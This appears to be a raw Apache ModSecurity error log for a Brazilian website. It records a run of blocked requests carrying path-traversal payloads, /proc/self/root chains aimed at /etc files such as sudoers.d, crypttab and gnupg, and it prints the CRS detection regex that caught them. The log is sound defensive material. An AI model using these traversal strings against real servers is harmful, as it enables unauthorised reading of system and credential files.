"ab1qz_qxLDW4GITHUkQpBQAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:42:16.871562 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.241.31:60502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1q2PqxLDW4GITHUkQpEgAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:42:21.029776 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.38:55778] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1q3da6ubjKNq_cu4Ya-AAAA0Y"]
[Fri Mar 20 12:43:00.142359 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.241.31:36146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rBDJ3M9BSuKP7CAZogAAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:43:27.190950 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.120:58882] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1rHRCii7xarUs8iHaogwAAAhY"]
[Fri Mar 20 12:43:30.946450 2026] [:error] [pid 31215:tid 140411716749056] [client 216.73.216.191:59060] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1rIgF0L0L-SsrnPo6lBQAAAsM"]
[Fri Mar 20 12:43:37.363159 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.241.31:48138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rKfqxLDW4GITHUkQpXwAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:38.659398 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.241.31:46358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rKvXLqtnMIWvjpaLaxAAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:40.123311 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.241.31:46360] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rLLninkcc-iUj5AqX8gAAA4M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:42.591537 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:46370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rLgF0L0L-SsrnPo6lGgAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:44.397470 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:46380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rMOoXxyEfFpUF8f-85wAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:44.445099 2026] [:error] [pid 21219:tid 140411582465792] [client 57.141.18.9:59926] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1rMPXLqtnMIWvjpaLa2AAAApM"]
[Fri Mar 20 12:43:47.638743 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:46396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rMzJ3M9BSuKP7CAZotAAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:51.261763 2026] [mime_magic:error] [pid 7235:tid 140411699963648] (70014)End of file found: [client 57.141.18.91:60256] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:43:51.892009 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:39700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rN_qxLDW4GITHUkQpdQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:53.450973 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.241.31:39710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rOQF0L0L-SsrnPo6lJQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:54.870918 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.241.31:39712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rOjJ3M9BSuKP7CAZouQAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:56.209491 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.241.31:39714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rPF1pVZ5mVmJwsFNrnQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:43:57.521141 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:38250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rPeoXxyEfFpUF8f-8_gAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:01.415256 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:38266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rQda6ubjKNq_cu4YbUAAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:03.077552 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:38278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rQ-oXxyEfFpUF8f-9BAAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:04.599229 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.241.31:38290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rRPHIg5MgXLBnicMxmQAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:05.951460 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:38304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rReoXxyEfFpUF8f-9DAAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:07.222062 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.241.31:38306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rR_HIg5MgXLBnicMxnQAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
